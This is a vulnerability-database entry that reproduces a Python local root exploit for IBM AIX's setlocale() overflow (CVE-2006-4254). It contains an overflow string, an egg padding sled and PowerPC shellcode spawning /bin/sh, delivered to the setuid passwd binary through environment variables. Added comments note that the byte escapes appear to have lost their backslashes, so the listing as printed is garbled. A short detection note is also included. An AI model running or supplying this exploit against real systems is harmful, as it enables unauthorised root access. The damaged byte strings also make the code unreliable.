IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit

2007-11-08T00:00:00
ID SSV:7461
Type seebug
Reporter Root
Modified 2007-11-08T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #
#setlocale() exploit for aix 5.2 ( CVE-2006-4254  )
#thomas.pollet@gmail.com
#
from os import execve

# Overflow string delivered through the LC_TIME environment variable: 580
# filler bytes followed by a fixed tail. The tail is written here with the
# characters "x2f", "xf2", ... as literal text; NOTE(review): the listing
# appears to have lost its backslashes in extraction, so as printed these
# are plain ASCII strings rather than the byte values the comments name.
bof="a"*580+"bbbbccccddddx2fxf2x28x2f"
# Padding placed in front of the payload inside the EGG environment variable
# (same extraction caveat as above for "x60").
egg="x60"*2350
shellcode=(            # by intropy <at> caughq.org
"x7cxa5x2ax79"     # xor.    r5,r5,r5
"x40x82xffxfd"     # bnel    <shellcode>
"x7fxe8x02xa6"     # mflr    r31
"x3bxffx01x20"     # cal     r31,0x120(r31)
"x38x7fxffx08"     # cal     r3,-248(r31)
"x38x9fxffx10"     # cal     r4,-240(r31)
"x90x7fxffx10"     # st      r3,-240(r31)
"x90xbfxffx14"     # st      r5,-236(r31)
"x88x5fxffx0f"     # lbz     r2,-241(r31)
"x98xbfxffx0f"     # stb     r5,-241(r31)
"x4cxc6x33x42"     # crorc   cr6,cr6,cr6
"x44xffxffx02"     # svca
"/bin/sh"
"x05")

# Replaces the current process with /usr/bin/passwd, passing an argv of one
# empty string and an environment that contains only EGG and LC_TIME.
# Defensive note: the observable here is a passwd process started with an
# abnormally long locale variable (LC_TIME well over 500 bytes) and a large
# unrelated variable (EGG) in its environment; auditing process environments
# for oversized LC_* values is one way to detect attempts of this shape.
execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})

# sebug.net